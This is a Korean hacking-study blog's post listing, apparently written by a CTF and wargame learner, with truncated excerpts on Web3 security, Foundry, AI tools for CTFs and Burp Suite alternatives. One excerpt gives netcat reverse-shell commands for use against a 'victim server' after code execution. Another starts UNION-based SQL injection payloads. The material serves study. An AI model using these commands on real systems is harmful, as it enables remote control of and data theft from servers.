Burnnnnnnnnnny

Web3와 블록체인 보안

Web3와 블록체인 보안: 새로운 시대의 도전과 기회서론Web3 시대가 도래하면서 블록체인 기술은 우리 일상 생활의 많은 부분을 변화시키고 있습니다. 그러나 이러한 혁신적인 기술의 등장은 새로운 보안 위협과 도전을 동반합니다. 이 글에서는 Web3와 블록체인의 핵심 개념을 살펴보고, 이와 관련된 주요 보안 이슈들을 탐구해 보겠습니다.Web3란 무엇인가?Web3는 분산화, 개방성, 그리고 더 큰 사용자 효용을 제공하는 차세대 인터넷을 의미합니다. 이는 블록체인 기술을 기반으로 하며, 중앙화된 플랫폼에 의존하지 않고 사용자들이 직접 소유하고 통제하는 디지털 자산과 데이터를 가능케 합니다.블록체인 기술의 핵심블록체인은 분산 네트워크에서 운영되는 디지털 원장 기술입니다. 주요 특징으로는:분산성: 중앙 서버 없이..

웹 보안이란

웹 보안의 기초: 안전한 온라인 환경 구축하기안녕하세요, 오늘은 웹 보안에 대해 이야기해보려고 합니다. 인터넷이 우리 일상생활에 깊숙이 자리 잡은 지금, 온라인 보안의 중요성은 그 어느 때보다 커졌습니다.웹 보안이란?웹 보안은 웹사이트, 웹 애플리케이션, 웹 서비스를 악의적인 공격으로부터 보호하는 과정을 말합니다. 이는 사용자의 개인정보를 지키고, 시스템의 무결성을 유지하며, 서비스의 가용성을 보장하는 것을 목표로 합니다.주요 웹 보안 위협SQL 인젝션크로스 사이트 스크립팅 (XSS)크로스 사이트 요청 위조 (CSRF)취약한 인증 및 세션 관리보안 설정 오류웹 보안 강화를 위한 기본 단계입력 유효성 검사: 모든 사용자 입력을 서버 측에서 철저히 검증합니다.HTTPS 사용: 모든 통신을 암호화하여 데이터 ..

Foundry는 Ethereum 스마트 계약 개발을 위한 강력한 도구 모음입니다. 다음은 Foundry의 주요 구성 요소와 사용법에 대한 간단한 설명입니다:Forge: 스마트 계약 테스팅 프레임워크계약 컴파일 및 테스트 실행가스 최적화 및 퍼징 테스트 지원Cast: 이더리움 트랜잭션 및 호출을 위한 명령줄 도구RPC 호출 실행트랜잭션 전송 및 서명Anvil: 로컬 이더리움 노드 시뮬레이터개발 및 테스트를 위한 로컬 블록체인 환경 제공Chisel: 대화형 Solidity REPL (Read-Eval-Print Loop)Solidity 코드 실시간 테스트 및 실험설치 및 사용 방법:Foundry 설치:Copycurl -L https://foundry.paradigm.xyz | bash foundryup새 프..

워게임이나 CTF풀때 ai를 요즘 참 많이 쓴다. ai안쓰면 해킹 못할 정도 임 ㄹㅇ 루다가 필자는 일단 클로드랑 깃허브 코파일럿을 쓰고 있다. 참고로 깃헙 코파일럿은 학생이면 무료로 이용할 수 있다.  참고로 필자는 gpt4를 결제를 한적이있다. 과제등을 할때 참 야무지게 사용했지만 해킹등 문제풀때 도움이 하나도 안되서 클로드를 이용하고 있다 클로드는 코딩할때 참 좋지만 문제는 사용리미트가 너무빨리 걸린다는 유일한 단점이 있다. 깃허브 코파일럿은 약간 귀찮은 작업같은거 ide에서 해치우고 싶을때 그리고 자동완성은 맘에 들었다.대신 나머지는 아직 먼거같다. 결론적으로 현재 필자는 클로드를 4개월인가 정도 쓰고 있는데 나쁘지 않다. 클로드 3.5소넷 아주 강추한다.  gpt는 수많은 플러그인으로 코딩 외적..

웹해킹한지 언 1년차가 넘어가는 이 시점 내가 Burp Suite를 잘 안쓰는 이유를 설명하도록 하겠다.  Burp Suite의 기능을 개발자도구가 거의 대채할 수 있기 때문이다.물론 Burp Suite의 100%기능을 잘 모른다 근데 대충 Burp Suite의 repeater와 proxy 기능정도는 대충안다. 근데 이건 개발자도구로 쉽고 강력하게 대채를 할 수 있는게 proxy의 경우 중간에서 패킷을 조작하기 위해 사용한다. 개발자도구는 네트워크 탭에 간 패킷을 우클릭하면 fetch로 복사하기 기능이 있어 해당 기능에 body나 등등을 수정하고 요청하면 대채할 수 있다. 심지어 repeater의 경우 방금 이야기한 fetch에 for문등 반복문으로 하면 대채할 수 있다 ㅇㅇ;;아주 ez하게 해킹 할 수..

요즘 WEB3에 관심이 생겨서 메타마스크 지갑을 만들어봤다크롬 확장 프로그램으로 메타마스크 지갑을 만들어봤고 구글 클라우드한테 매일 0.05이더를 받을 수 있다. https://cloud.google.com/application/web3/faucet Web3 FaucetGet free testnet tokens for Web3 development. Use these tokens to deploy smart contracts, debug transactions, and experiment on EVM testnets.cloud.google.com ethernaut푸는데 이더가 조금 필요하니까 받아놓아야한다. ㅇㅇ;; 요즘 크립토 좀비로 솔리디티 언어 공부 중이고  https://ethernaut.open..

셸인지 쉘인지 그게 중요한가 싶지만 어찌됐든 웹해킹문제 풀 때 언젠간 쓸모 있을 거 같아 만들어 놓는다 ㅎㅎ구름 IDE에 들어가서 가입 후 컨테이너를 블랭크로 만든다. 그 뒤에 설정에 들어가 내부포트를 설정해준다.nc 설치apt-get install netcat (공격자) 포트 열기nc -lvp 내부포트 (희생자 서버)그리고 리버스 셸nc IP주소 외부포트-e /bin/sh 원격코드 실행이 된다면 유용하게 쓸 수 있을 거 같다.뭐 SSTI라던가 혹은 다른 RCE가 가능하다면 리버스 셸도 하나의 유용한 방법일 듯 리버스 셸은 기본이다 기본 ㅇㅇhttps://www.revshells.com/ Online - Reverse Shell GeneratorOnline Reverse Shell generator wi..

UNION SQL injection을 알아보도록 하장 ㅎUNION은 SQL에서 두개의 쿼리문에 대한 결과를 통합해서 하나의 테이블로 보여주게 하는 키워드다.정상적 쿼리문에 UNION 키워드를 사용하여 injection에 성공하면, 원하는 쿼리문을 실행 할 수 있게 된다. UNION: 중복 제거 결과UNION ALL: 중복 포함 결과 조건: UNION 하는 두 테이블 COLUMN의 개수가 같아야함. 그럼 일단 나는 MySQL과 SQL injection이 성공한다는 가정하에 설명하도록 하겠다.  일단 조건 즉 COLUMN의 개수를 찾는 방법을 설명하도록 하겠다 1' union select 1#1' union select 1,2# 1' union select 1,2,3#1' union select 1,2,3,..